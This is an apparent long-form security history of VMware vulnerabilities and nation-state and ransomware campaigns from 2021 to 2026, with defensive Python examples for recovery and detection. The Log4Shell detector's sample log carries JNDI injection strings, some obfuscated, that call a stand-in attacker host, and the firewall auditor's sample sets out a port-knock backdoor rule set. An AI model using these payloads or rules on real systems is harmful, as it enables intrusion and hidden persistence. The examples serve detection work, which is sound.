Under Siege: The Complete History of VMware Vulnerabilities, Exploits, and Nation-State Attacks

A comprehensive technical and strategic analysis of VMware security incidents from 2021 to 2026 — covering critical CVEs, mass ransomware campaigns, nation-state zero-day exploitation, and the evolving threat landscape targeting enterprise virtualization infrastructure.

Introduction: Why VMware Is a Prime Target

VMware's virtualization infrastructure underpins a significant portion of enterprise computing worldwide. VMware ESXi, vCenter Server, VMware Workstation, VMware Fusion, and the broader ecosystem of products including Workspace ONE, Horizon, and Aria Operations collectively form the backbone of virtualized environments across government agencies, financial institutions, healthcare organizations, and critical infrastructure. That market dominance makes VMware one of the highest-value targets in all of cybersecurity.

When threat actors compromise a VMware hypervisor, they do not gain access to a single machine. They gain potential access to every virtual machine running on that host, along with the management plane that governs the entire virtualized environment. A successful exploitation of vCenter Server, for instance, can give an attacker administrative control over hundreds or thousands of virtual machines simultaneously. This is precisely why ransomware groups, nation-state actors, and financially motivated cybercriminals have systematically hunted for VMware vulnerabilities, with publicly documented attack campaigns stretching back to at least 2021.

Since Broadcom completed its acquisition of VMware in November 2023, the products have continued under the Broadcom brand, though the underlying software and its associated vulnerabilities remain the same. This article documents the major VMware security incidents, critical CVEs, and attack campaigns spanning from the early exploitation era through the most recent espionage operations uncovered in early 2026.

The ESXiArgs Mass Ransomware Campaign (2023)

One of the largest mass-exploitation events in VMware history occurred in February 2023, when attackers launched a global campaign targeting exposed VMware ESXi servers using a vulnerability that had been publicly known for nearly two years. The campaign, which security researchers named ESXiArgs, exploited CVE-2021-21974, a heap overflow vulnerability in the OpenSLP (Service Location Protocol) service built into ESXi.

The vulnerability itself was disclosed and patched by VMware in February 2021. The CVSS score was 8.8, and the attack required no authentication — an attacker on the same network segment, or in some configurations over the internet, could send a specially crafted SLP message to port 427 and achieve remote code execution on the hypervisor. Despite the patch being available for two years, thousands of organizations had never applied it.

The French Computer Emergency Response Team (CERT-FR) was among the first to issue a public warning, noting that the campaign was targeting ESXi servers globally. CISA published guidance and even released a recovery script to help victims whose virtual machine configuration files had been encrypted by the ESXiArgs payload. Researchers estimated that thousands of ESXi hosts were compromised in the initial wave of attacks, with victims spanning Europe, North America, and Asia.

"Admins, hosting providers, and CERT-FR warn that attackers actively target VMware ESXi servers unpatched against a two-year-old remote code execution vulnerability to deploy ransomware." — BleepingComputer, February 2023

What made ESXiArgs particularly damaging was the attacker's understanding of ESXi architecture. Rather than encrypting the virtual machine disk files (VMDK) directly, which are large and time-consuming to encrypt, the attackers targeted the smaller descriptor and configuration files that ESXi uses to locate and map virtual disk data. This approach rendered VMs unbootable quickly while leaving the bulk of the actual data intact — in some cases enabling partial recovery, but in others causing complete operational disruption.
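The descriptor-versus-flat-file distinction above is the whole reason partial recovery was possible, and it is also something a responder can check mechanically. The following triage script is an added example, not code from the article, CISA, or VMware: it validates each VMDK descriptor on a datastore (a text file that must start with a `# Disk DescriptorFile` header and name its extents), flags descriptors that are no longer readable text or that no longer agree with the size of their `-flat` extent, and shows how a minimal descriptor can be regenerated from an intact flat file, which is the same idea the CISA recovery script relied on. The datastore contents, VM names, and sector counts are constructed; the adapter type in the rebuilt descriptor is an assumption that must match the original VM's hardware.

```python
import re
from dataclasses import dataclass

SECTOR = 512  # VMDK extent sizes are expressed in 512-byte sectors

# Constructed sample datastore: filename -> file bytes. A real check would
# read these from the VMFS volume; the -flat files here are zero-filled
# stand-ins with the right lengths, not disk images.
GOOD_DESCRIPTOR = b"""# Disk DescriptorFile
version=1
encoding="UTF-8"
CID=fffffffe
parentCID=ffffffff
createType="vmfs"

# Extent description
RW 2048 VMFS "web01-flat.vmdk"

# The Disk Data Base
#DDB
ddb.adapterType = "lsilogic"
ddb.virtualHWVersion = "14"
"""

# Constructed: a descriptor overwritten with ciphertext. No header, no extent
# line, and bytes outside the ASCII range.
ENCRYPTED_DESCRIPTOR = bytes(range(256)) * 2

SAMPLE_DATASTORE = {
    "web01.vmdk": GOOD_DESCRIPTOR,
    "web01-flat.vmdk": b"\0" * (2048 * SECTOR),
    "db01.vmdk": ENCRYPTED_DESCRIPTOR,
    "db01-flat.vmdk": b"\0" * (4096 * SECTOR),
}

# Extent line: access mode, size in sectors, type, quoted extent filename
EXTENT_RE = re.compile(r'^(RW|RDONLY|NOACCESS)\s+(\d+)\s+(\w+)\s+"([^"]+)"', re.M)


@dataclass
class Finding:
    descriptor: str
    status: str  # "ok", "unreadable", "missing-extent" or "size-mismatch"
    detail: str


def check_descriptor(name, data, datastore):
    """Validate one descriptor against the files actually present."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return Finding(name, "unreadable", "not ASCII text; possibly encrypted")
    if not text.startswith("# Disk DescriptorFile"):
        return Finding(name, "unreadable", "missing '# Disk DescriptorFile' header")
    extents = EXTENT_RE.findall(text)
    if not extents:
        return Finding(name, "unreadable", "no extent lines found")
    for _, sectors, _, extent_name in extents:
        if extent_name not in datastore:
            return Finding(name, "missing-extent", f"{extent_name} not found")
        expected, actual = int(sectors) * SECTOR, len(datastore[extent_name])
        if expected != actual:
            return Finding(name, "size-mismatch",
                           f"{extent_name}: descriptor says {expected} bytes, file is {actual}")
    return Finding(name, "ok", f"{len(extents)} extent(s) verified")


def triage_datastore(datastore):
    """Check every descriptor (every .vmdk that is not itself a -flat extent)."""
    return [check_descriptor(n, datastore[n], datastore)
            for n in sorted(datastore)
            if n.endswith(".vmdk") and not n.endswith("-flat.vmdk")]


def rebuild_descriptor(flat_name, flat_size, adapter="lsilogic"):
    """Minimal descriptor for an intact -flat extent. The adapter type is an
    assumption; it has to match the VM's original virtual hardware."""
    sectors = flat_size // SECTOR
    return ("# Disk DescriptorFile\nversion=1\nencoding=\"UTF-8\"\nCID=fffffffe\n"
            "parentCID=ffffffff\ncreateType=\"vmfs\"\n\n# Extent description\n"
            f'RW {sectors} VMFS "{flat_name}"\n\n# The Disk Data Base\n#DDB\n'
            f'ddb.adapterType = "{adapter}"\n')


if __name__ == "__main__":
    for f in triage_datastore(SAMPLE_DATASTORE):
        print(f"{f.descriptor:12} {f.status:15} {f.detail}")
```

Running the script against the sample datastore reports `db01.vmdk` as unreadable and `web01.vmdk` as intact; feeding `rebuild_descriptor("db01-flat.vmdk", ...)` back through `check_descriptor` passes, which is the point: as long as the large flat extent survived, the small file the attackers destroyed can be regenerated.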

CVE-2021-21974  |  CVSS: 8.8  |  VMware ESXi OpenSLP — Heap overflow enabling unauthenticated remote code execution via SLP on port 427

Log4Shell in VMware vCenter and Horizon (2021–2022)

When the Log4Shell vulnerability (CVE-2021-44228) was publicly disclosed in December 2021, security teams around the world scrambled to identify every application that embedded the Apache Log4j logging library. VMware vCenter Server was among the affected products, and because vCenter is frequently exposed to internal networks with high levels of trust, the implications were severe.

Researchers at Rapid7 quickly confirmed that vCenter Server was trivially exploitable via Log4Shell. The attack vector involved sending a JNDI injection string in the HTTP X-Forwarded-For header to the vCenter login page endpoint. vCenter would log this header using Log4j, which would then reach out to the attacker's server, download a malicious Java class, and execute it — achieving remote code execution as the root user on the Linux appliance or as SYSTEM on Windows installations.

Rapid7 researchers stated that "basically all vCenter instances should be trivially exploitable by a remote and unauthenticated attacker" following their published proof-of-concept in December 2021.
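Because the injection point described above is a logged request header, the attack leaves a trace in the web server's access log, and attackers routinely hid the literal string `jndi` behind Log4j's own nested lookups (`${lower:j}`, `${::-j}`, and similar). The detector below is an added example written for this article, not Rapid7's or VMware's code: it resolves those nesting tricks the way Log4j would before testing for a JNDI lookup, then runs over a few constructed access-log lines that carry the header value in their last field. The log format, paths, and `attacker.example` hostname are all constructed.

```python
import re

# Innermost ${...} lookup: one whose body contains no further '${' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match):
    """Evaluate the Log4j lookups used to obfuscate the word 'jndi'.
    Anything we do not understand is returned untouched."""
    body = match.group(1)
    if ":-" in body:                      # ${whatever:-default} -> default
        return body.rsplit(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":  # ${lower:X} -> x
        return rest.lower()
    if sep and prefix.lower() == "upper":  # ${upper:x} -> X
        return rest.upper()
    return match.group(0)


def normalize_lookups(value, max_rounds=20):
    """Repeatedly collapse innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, value)
        if new == value:
            break
        value = new
    return value


def contains_jndi_lookup(value):
    return "${jndi:" in normalize_lookups(value).lower()


def scan_access_log(lines):
    """Return (line number, de-obfuscated line) for every line carrying a JNDI lookup."""
    return [(n, normalize_lookups(line))
            for n, line in enumerate(lines, 1) if contains_jndi_lookup(line)]


# Constructed access-log lines; the trailing quoted field is X-Forwarded-For.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "10.0.0.5"',
    '10.0.0.9 - - [12/Dec/2021:10:01:07 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "curl/7.68" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:09 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "curl/7.68" "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:11 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "curl/7.68" "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.7 - - [12/Dec/2021:10:02:00 +0000] "GET /ui/login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "${date:yyyy}"',
]

if __name__ == "__main__":
    for n, line in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Three of the five sample lines are flagged, including the two obfuscated ones, while the harmless `${date:yyyy}` lookup is not. Treat a hit as a signal to investigate the vCenter or Horizon host, not as proof of compromise either way: Log4j has further lookup types this normalizer does not evaluate, so the durable fix remains the vendor patch.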

The Conti ransomware group was reported by threat intelligence firm AdvIntel to be actively exploiting Log4Shell against vCenter Server for lateral movement as early as December 2021. State-sponsored actors were not far behind. CISA published an advisory in June 2022 documenting continued exploitation of Log4Shell against VMware Horizon systems, noting that Iranian government-sponsored advanced persistent threat (APT) actors had exploited the vulnerability to deploy ransomware and disk-wiping malware against U.S. organizations including defense contractors.

VMware Horizon, the virtual desktop infrastructure product, was separately and heavily targeted through the same Log4j vulnerability. CISA and CGCYBER jointly published advisories detailing how multiple threat actor groups had compromised Horizon servers, established persistence, and used compromised systems for further access into victim networks. The persistence techniques observed included deployment of web shells, tunneling software, and credential harvesting tools.

CVE-2021-44228 (Log4Shell)  |  CVSS: 10.0  |  VMware vCenter, Horizon — Remote code execution via Log4j JNDI injection; unauthenticated, no user interaction required

VMware Workspace ONE and Horizon RCE Cluster (2022)

April 2022 brought a fresh wave of critical disclosures when VMware published an advisory covering eight vulnerabilities across VMware Workspace ONE Access, Identity Manager, and vRealize Automation. The most dangerous of the group was CVE-2022-22954, a remote code execution vulnerability resulting from server-side template injection.

CVE-2022-22954 was particularly alarming because exploitation required only a single HTTP request — no credentials, no complex setup. Within days of the advisory, proof-of-concept code appeared on GitHub, and Palo Alto Networks Unit 42 observed exploitation in the wild beginning April 11, 2022 — five days after the advisory was published. Attackers used the vulnerability to deploy variants of the Mirai botnet malware, the Enemybot botnet (which itself embedded the CVE-2022-22954 exploit for further propagation), and web shells including the Godzilla web shell, a tool frequently associated with Chinese-speaking threat actors.

Unit 42 observed that "CVE-2022-22954, a remote code execution vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device."

Alongside CVE-2022-22954, the cluster included CVE-2022-22960, a local privilege escalation flaw. CISA documented cases where threat actors chained these two vulnerabilities together — using the RCE to gain initial access and then leveraging the privilege escalation to achieve root-level control. The advisory noted at least one case where attackers accessed test and production environments of a large organization and deployed the Dingo J-spy web shell.

A second set of VMware disclosures in May 2022 added CVE-2022-22972 and CVE-2022-22973, two more vulnerabilities affecting the same product lines that CISA warned were highly likely to be exploited. The rapid succession of critical vulnerabilities in VMware's identity and access management products raised concerns about the underlying code quality of those specific components.

CVE-2022-22954  |  CVSS: 9.8  |  VMware Workspace ONE Access / Identity Manager — Server-side template injection RCE; exploitable with a single unauthenticated HTTP request

CVE-2022-22960  |  CVSS: 7.8  |  VMware Workspace ONE Access — Local privilege escalation; chained with CVE-2022-22954 for full root access

The vCenter Critical File Upload Vulnerability (CVE-2021-22005)

Before the ESXiArgs campaign and the 2022 wave, VMware faced one of its most alarming single-CVE disclosures in September 2021. CVE-2021-22005, a file upload vulnerability in vCenter Server's analytics service, allowed an attacker with network access to port 443 on vCenter to upload a specially crafted file and achieve remote code execution — completely without authentication.

The vulnerability was given a CVSS score of 9.8 and was patched by VMware as part of a bundle of 19 fixes affecting vCenter Server and VMware Cloud Foundation. CISA issued an alert within two days of the patch confirming the vulnerability was already under active exploitation. The severity was such that VMware stated in its advisory that it was "critical" and recommended immediate patching regardless of other security controls in place.

The exploit path was straightforward for a skilled attacker: any system capable of reaching vCenter's HTTPS port could potentially trigger code execution as an administrator. Given that vCenter is typically accessible from management networks and sometimes directly exposed to broader enterprise networks, this meant a large number of installations were at risk even before the vulnerability was publicly well-understood.

CVE-2021-22005  |  CVSS: 9.8  |  VMware vCenter Server — Unauthenticated file upload to analytics service enabling RCE; exploited within 48 hours of patch release

VM Escape Vulnerabilities: Breaking Out of the Hypervisor (2024)

A particularly technically sophisticated class of VMware vulnerability involves virtual machine escape — flaws that allow code running inside a guest virtual machine to break out of the isolation boundary and execute on the underlying host hypervisor. In March 2024, VMware disclosed a cluster of four such vulnerabilities that collectively warranted a critical severity rating.

CVE-2024-22252 and CVE-2024-22253 were use-after-free vulnerabilities in the XHCI (USB 3.0) and UHCI (USB 1.0) controllers respectively, both carrying CVSS scores of 9.3 on VMware Workstation and Fusion. An attacker with local administrative privileges inside a virtual machine could exploit these flaws to execute code as the VMX process on the host — effectively escaping the VM. On ESXi, the exploitation was partially contained within the VMX sandbox, but on Workstation and Fusion it could lead to direct code execution on the host machine.

CVE-2024-22254 added an out-of-bounds write in ESXi that could allow a VMX process escape from the sandbox. CVE-2024-22255 rounded out the cluster with an information disclosure flaw in the UHCI controller. CERT-EU strongly recommended immediate patching and noted that the combination of these vulnerabilities should be treated as critical regardless of the individual scores.

CVE-2024-22252  |  CVSS: 9.3 (Workstation/Fusion)  |  VMware ESXi, Workstation, Fusion — Use-after-free in XHCI USB controller; VM escape to VMX process execution on host

CVE-2024-22253  |  CVSS: 9.3 (Workstation/Fusion)  |  VMware ESXi, Workstation, Fusion — Use-after-free in UHCI USB controller; similar VM escape pathway

CVE-2024-22254  |  CVSS: 7.9  |  VMware ESXi — Out-of-bounds write enabling VMX sandbox escape

The vCenter DCE/RPC Heap Overflow Cluster (2024)

June 2024 saw Broadcom patch two heap overflow vulnerabilities in vCenter Server's implementation of the DCE/RPC protocol — a core communications protocol used extensively in Windows-centric enterprise environments. CVE-2024-37079 and CVE-2024-37080, both scoring 9.8 on the CVSS scale, allowed an attacker with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.

The vulnerabilities were discovered by Chinese cybersecurity researchers Hao Zheng and Zibo Li from QiAnXin LegendSec. At the Black Hat Asia security conference in April 2025, the researchers revealed that the two publicly disclosed flaws were part of a set of four vulnerabilities in the DCE/RPC service — three heap overflows and one privilege escalation — giving researchers a deeper view into the structural weaknesses of that code path.

CISA added CVE-2024-37079 to its Known Exploited Vulnerabilities (KEV) catalog after Broadcom confirmed active in-the-wild abuse, requiring Federal Civilian Executive Branch agencies to patch by February 13, 2026. The identity of the threat actors exploiting these vulnerabilities was not publicly confirmed, but the sophistication required to weaponize heap overflow vulnerabilities in a network-accessible RPC service pointed to well-resourced adversaries.

CVE-2024-37079  |  CVSS: 9.8  |  VMware vCenter Server — Heap overflow in DCE/RPC protocol handler; network-accessible RCE without authentication

CVE-2024-37080  |  CVSS: 9.8  |  VMware vCenter Server — Second heap overflow in DCE/RPC protocol; same attack surface as CVE-2024-37079

ESXi Active Directory Authentication Bypass (CVE-2024-37085)

In mid-2024, a different kind of vCenter/ESXi vulnerability drew attention from ransomware operators. CVE-2024-37085 was not a typical memory corruption or injection flaw — it was a logic error in how ESXi handled Active Directory group memberships for administrative access. When an ESXi host was configured to use Active Directory for user management, it recognized membership in a special AD group called "ESXi Admins" as conferring administrative privileges on the hypervisor.

The vulnerability arose from the fact that ESXi would grant full administrative access to any user belonging to a group named "ESXi Admins" in Active Directory — even if that group had been deleted and then recreated by a different user. An attacker with sufficient permissions in an Active Directory environment could create or rename a group to "ESXi Admins," add a compromised user account to it, and gain full ESXi host access without needing any VMware-specific credentials or exploiting any memory corruption.
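The root cause here is a general one: authorization was bound to a group's display name, which anyone with group-management rights can reproduce, instead of to the group's immutable identifier. The model below is an added illustration, not ESXi or Active Directory code: a toy directory whose groups carry a stable SID and a mutable name, the name-based check the article describes, and the SID-pinned alternative, run through the delete-and-recreate scenario. Group and user names, and the SID format, are constructed.

```python
import itertools
from dataclasses import dataclass, field

# Constructed SIDs; real AD SIDs are domain-specific and never reused.
_sid_counter = itertools.count(1000)


@dataclass
class Group:
    name: str
    sid: str = field(default_factory=lambda: f"S-1-5-21-EXAMPLE-{next(_sid_counter)}")
    members: set = field(default_factory=set)


class Directory:
    """Minimal stand-in for a directory service keyed by SID."""

    def __init__(self):
        self.groups = {}

    def create_group(self, name):
        g = Group(name)
        self.groups[g.sid] = g
        return g

    def delete_group(self, sid):
        del self.groups[sid]

    def rename_group(self, sid, new_name):
        self.groups[sid].name = new_name

    def groups_of(self, user):
        return [g for g in self.groups.values() if user in g.members]


# Vulnerable pattern: trust follows the group *name*. Any group that happens
# to be called "ESXi Admins" at check time confers admin rights.
def is_admin_by_name(directory, user, admin_group_name="ESXi Admins"):
    return any(g.name == admin_group_name for g in directory.groups_of(user))


# Hardened pattern: trust follows the SID recorded when the host was joined.
# A deleted-and-recreated (or renamed) group never matches the pinned SID.
def is_admin_by_sid(directory, user, pinned_sid):
    return any(g.sid == pinned_sid for g in directory.groups_of(user))


def demo():
    d = Directory()
    admins = d.create_group("ESXi Admins")
    admins.members.add("alice")
    pinned = admins.sid  # what a host should store at join time
    before = (is_admin_by_name(d, "alice"), is_admin_by_sid(d, "alice", pinned))

    # The scenario from the text: the original group is deleted and a new
    # group with the same name is created by someone else.
    d.delete_group(admins.sid)
    recreated = d.create_group("ESXi Admins")
    recreated.members.add("mallory")
    after = (is_admin_by_name(d, "mallory"), is_admin_by_sid(d, "mallory", pinned))
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("legitimate admin  (by name, by SID):", before)
    print("recreated group   (by name, by SID):", after)
```

The name-based check accepts the recreated group's member; the SID-pinned check does not. On a real host the corresponding controls are the ESXi advanced settings that name the administrative AD group and toggle its automatic mapping to the Administrator role (`Config.HostAgent.plugins.hostsvc.esxAdminsGroup` and `Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd`); the model only shows why a name is the wrong thing to trust.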

Microsoft's threat intelligence teams documented ransomware operators including Storm-0506, Storm-1175, Manatee Tempest, and Octo Tempest exploiting this vulnerability. The CVSS score of 6.8 understated the real-world impact — in many ransomware deployments, the ability to take full control of an ESXi host using only AD credentials meant attackers could encrypt every virtual machine on a host within minutes of gaining initial domain access.

CVE-2024-37085  |  CVSS: 6.8  |  VMware ESXi — AD group-based authentication bypass; recreating deleted 'ESXi Admins' AD group grants full hypervisor administrative access

The March 2025 Zero-Day Trio: Chinese Espionage Tools in the Wild

In March 2025, Broadcom disclosed three VMware vulnerabilities that were already being actively exploited in the wild at the time of disclosure. The cluster — CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226 — was reported to Broadcom by the Microsoft Threat Intelligence Center, a signal that the vulnerabilities had been identified through observation of active exploitation rather than proactive security research.

CVE-2025-22224 was a TOCTOU (Time-of-Check Time-of-Use) vulnerability in the Virtual Machine Communication Interface (VMCI) of VMware ESXi and Workstation that led to an out-of-bounds write. A local attacker with administrative or root privileges in a guest virtual machine could exploit this flaw to escape to the hypervisor level and execute arbitrary code as the VMX process. CVE-2025-22225 was an arbitrary write vulnerability in ESXi that could allow a privileged VMX process to write to kernel memory, completing a chain to full hypervisor compromise. CVE-2025-22226 was an information disclosure flaw in the Host Guest File System (HGFS) component of ESXi, Workstation, and Fusion that could leak hypervisor memory to a guest with administrative privileges.

In January 2026, cybersecurity firm Huntress published an analysis of an intrusion observed the previous month in which the exploit toolkit was deployed. The Huntress Tactical Response team assessed with moderate confidence that all three CVEs were being leveraged together as a chained exploit. Their analysis also uncovered development artifacts — including PDB debug paths containing simplified Chinese strings — with timestamps dating to as early as February 2024, meaning the toolkit was likely in operational use well before VMware had any opportunity to patch.

The Huntress Tactical Response team stated in their January 2026 analysis: "Based on our analysis of the exploit's behavior, its use of HGFS for information leaking, VMCI for memory corruption, and shellcode that escapes to the kernel, we assess with moderate confidence that this toolkit leverages these three CVEs."

CISA added all three vulnerabilities to its KEV catalog on March 4, 2025 — the same day Broadcom published its advisory. The development artifacts pointing to Chinese-speaking developers, combined with the sophistication of the tooling, placed this campaign squarely in the nation-state threat category.

CVE-2025-22224  |  CVSS: 9.3 (Critical)  |  VMware ESXi, Workstation — TOCTOU vulnerability in VMCI leading to out-of-bounds write; VM escape to VMX process execution on host

CVE-2025-22225  |  CVSS: 8.2 (Important)  |  VMware ESXi — Arbitrary write vulnerability enabling VMX sandbox escape to kernel

CVE-2025-22226  |  CVSS: 7.1 (Important)  |  VMware ESXi, Workstation, Fusion — Out-of-bounds read in HGFS leaking hypervisor memory to privileged guest

China's UNC5174 and the VMware Aria Zero-Day (CVE-2025-41244)

In September 2025, researchers at Belgian cybersecurity firm NVISO disclosed that a zero-day vulnerability in VMware Tools and VMware Aria Operations had been actively exploited since mid-October 2024. The vulnerability, CVE-2025-41244, was a local privilege escalation flaw with a CVSS score of 7.8 that affected systems running VMware Tools managed by Aria Operations with SDMP (Software Defined Management Platform) enabled.

NVISO attributed the exploitation to UNC5174, a China-linked threat actor that Mandiant has described as a former member of Chinese hacktivist collectives who has since shown indications of acting as a contractor for China's Ministry of State Security (MSS). The group has a documented history of exploiting vulnerabilities in edge appliances and enterprise software to gain initial access — its prior targets included F5 BIG-IP, ConnectWise ScreenConnect, and Ivanti products. Mandiant observed UNC5174 attempting to sell access to networks of U.S. defense organizations, UK government entities, and Asian institutions following earlier operations.

The vulnerability was rooted in how Aria Operations executed system binaries using broadly matched regular expressions for path matching. An unprivileged local attacker could stage a malicious binary in a path that matched these expressions — the specific path abused by UNC5174 in the wild was /tmp/httpd, mimicking a legitimate system process name. When executed, the malicious binary gained root-level privileges. NVISO released a proof-of-concept demonstrating the escalation chain and noted a concerning implication: the practice of mimicking system binary names suggested that other, unrelated malware strains may have accidentally been benefiting from this privilege escalation for years without researchers noticing.

NVISO researcher Maxime Thiebaut warned: "The broad practice of mimicking system binaries highlights the real possibility that several other malware strains have accidentally been benefiting from unintended privilege escalations for years."

CVE-2025-41244  |  CVSS: 7.8  |  VMware Tools, VMware Aria Operations — Local privilege escalation to root; exploited in the wild by UNC5174 since October 2024

The Dell RecoverPoint Zero-Day: VMware Backup Infrastructure Under Attack (CVE-2026-22769)

The most recent and arguably most strategically significant VMware-adjacent attack campaign was publicly disclosed in February 2026 by Google's Mandiant and Threat Intelligence Group. The central vulnerability — CVE-2026-22769 — was not in VMware software itself but in Dell RecoverPoint for Virtual Machines, a backup and disaster recovery appliance purpose-built to protect VMware environments. The attack demonstrated a sophisticated understanding of enterprise VMware deployments: rather than hitting vCenter or ESXi directly, the threat actors targeted the backup infrastructure that organizations rely on for resilience.

CVE-2026-22769 received the maximum possible CVSS score of 10.0. The flaw was a hardcoded credential vulnerability affecting all versions of Dell RecoverPoint for Virtual Machines prior to 6.0.3.1 HF1. The product's Apache Tomcat Manager component contained hardcoded default credentials in a configuration file located at /home/kos/tomcat9/tomcat-users.xml. An unauthenticated remote attacker who knew those credentials could connect to the Tomcat Manager, upload a malicious WAR file, and achieve root-level command execution on the appliance.

Google GTIG stated: "Analysis of incident response engagements revealed that UNC6201, a suspected PRC-nexus threat cluster, has exploited this flaw since at least mid-2024 to move laterally, maintain persistent access, and deploy malware including SLAYSTYLE, BRICKSTORM, and a novel backdoor tracked as GRIMBOLT."

The attributed threat actor, UNC6201, has notable overlaps with UNC5221 — a cluster that has been publicly associated with Silk Typhoon, a Chinese state-sponsored group. However, Google GTIG was careful to note that UNC6201 and UNC5221 are not considered identical. The exploitation had been ongoing since at least mid-2024, meaning the attackers had approximately 18 months of undetected access in victim environments before the vulnerability was publicly disclosed in February 2026.

The malware toolkit deployed through this campaign was sophisticated and layered. The initial foothold was established using the SLAYSTYLE web shell, uploaded via the compromised Tomcat Manager. BRICKSTORM, a backdoor written in the Go programming language specifically designed to target VMware vCenter servers, was deployed for persistent access and command-and-control communications. In September 2025, UNC6201 began replacing BRICKSTORM binaries with GRIMBOLT — a newer backdoor written in C# and compiled using native ahead-of-time (AOT) compilation, then packed with UPX to resist analysis. GRIMBOLT provided the same remote shell capability as BRICKSTORM but was substantially harder to detect and reverse-engineer.

Ghost NICs and Single Packet Authorization

Beyond the RecoverPoint appliance itself, the attackers demonstrated deep operational knowledge of VMware environments. Mandiant documented a novel persistence and lateral movement technique involving the creation of 'Ghost NICs' — temporary virtual network interface cards spun up on VMware ESXi servers. These ghost NICs allowed the attacker to create hidden network connectivity from within the virtualized environment, pivoting from compromised VMs into broader internal networks and, in some cases, into connected SaaS environments — all without generating the kinds of network traffic that perimeter security controls would typically flag.

The attackers also deployed iptables-based Single Packet Authorization (SPA) on compromised vCenter appliances. This technique involves configuring firewall rules that monitor incoming traffic on port 443 for a specific hidden hex string. When the magic packet arrives from an approved source IP, the firewall silently redirects subsequent traffic to an alternate port for a defined time window — in this case, five minutes. This creates a knock sequence mechanism that makes the backdoor completely invisible to network scanners and passive monitoring tools that do not know the specific trigger sequence.
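A knock mechanism of this kind is invisible on the wire, but it is not invisible in the appliance's own firewall configuration: a rule set that inspects packet payloads with the `string` match, keeps per-source state with the `recent` module, and redirects port 443 to another port is not something a vCenter appliance needs for its normal job. The audit below is an added example written for this article, not Mandiant's detection content: it parses `iptables-save` style output, flags individual rules that use those building blocks, and pairs an arming rule with the gating rule that shares its `recent` list name. The rule dump is constructed to have the shape the text describes; the hex string, list name and ports are placeholders, not the campaign's real indicators, and the benign rules are made up as well.

```python
import shlex

# Constructed iptables-save output for a management appliance. The two nat
# rules mimic the mechanism described above: a payload match on 443 puts
# the source on a 'recent' list, and a second rule redirects hosts on that
# list to another port for 300 seconds. Values are placeholders.
SAMPLE_IPTABLES_SAVE = """\
*filter
:INPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -s 10.10.0.0/24 -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 443 -m string --algo bm --hex-string "|5a5a5a5a|" -m recent --set --name knock --rsource
-A PREROUTING -p tcp -m tcp --dport 443 -m recent --rcheck --seconds 300 --name knock --rsource -j REDIRECT --to-ports 8443
COMMIT
"""


def parse_rules(dump):
    """Yield (table, tokens) for every '-A' rule line in iptables-save output."""
    table = None
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
        elif line.startswith("-A"):
            yield table, shlex.split(line)


def _values(tokens, flag):
    """All values following a given flag, e.g. every '-m' module name."""
    return [tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t == flag]


def audit_rule(tokens):
    """Reasons a single rule deserves a closer look (empty list if none)."""
    reasons = []
    modules = set(_values(tokens, "-m"))
    if "string" in modules:
        reasons.append("payload string match in a firewall rule")
    if "recent" in modules:
        reasons.append("'recent' module state (port-knock style gating)")
    if "REDIRECT" in _values(tokens, "-j") and "443" in _values(tokens, "--dport"):
        reasons.append("redirects port 443 to " + ",".join(_values(tokens, "--to-ports")))
    return reasons


def audit_dump(dump):
    """(table, rule text, reasons) for every rule that raised at least one reason."""
    return [(table, " ".join(tokens), reasons)
            for table, tokens in parse_rules(dump)
            if (reasons := audit_rule(tokens))]


def knock_pairs(dump):
    """Match an arming rule (-m recent --set) with a gating rule (--rcheck or
    --update plus REDIRECT) that share a 'recent' list name. Returns
    {list name: redirect target ports}."""
    armed, gated = {}, {}
    for _, tokens in parse_rules(dump):
        names = _values(tokens, "--name")
        if not names or "recent" not in _values(tokens, "-m"):
            continue
        if "--set" in tokens:
            armed[names[0]] = tokens
        if ("--rcheck" in tokens or "--update" in tokens) and "REDIRECT" in _values(tokens, "-j"):
            gated[names[0]] = _values(tokens, "--to-ports")
    return {name: gated[name] for name in armed if name in gated}


if __name__ == "__main__":
    for table, rule, reasons in audit_dump(SAMPLE_IPTABLES_SAVE):
        print(f"[{table}] {rule}\n    " + "; ".join(reasons))
    print("knock pairs:", knock_pairs(SAMPLE_IPTABLES_SAVE))
```

On the sample dump only the two nat rules are reported, and `knock_pairs` links them as one mechanism redirecting to port 8443. Baseline the firewall configuration of management appliances after deployment and diff it on a schedule; a `string` or `recent` match appearing on a vCenter appliance is worth an incident ticket regardless of what it matches.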

Dell published its advisory on February 17, 2026, and CISA added CVE-2026-22769 to its KEV catalog on February 18, 2026, with a short remediation deadline reflecting the severity of the threat. Austin Larsen, principal threat analyst at GTIG, noted that fewer than a dozen organizations had been confirmed affected, but warned that because exploitation had been occurring since mid-2024, any organization previously targeted by BRICKSTORM-associated campaigns should actively hunt for GRIMBOLT in their environments. Organizations running RecoverPoint for Virtual Machines prior to version 6.0.3.1 HF1 were instructed to upgrade immediately.

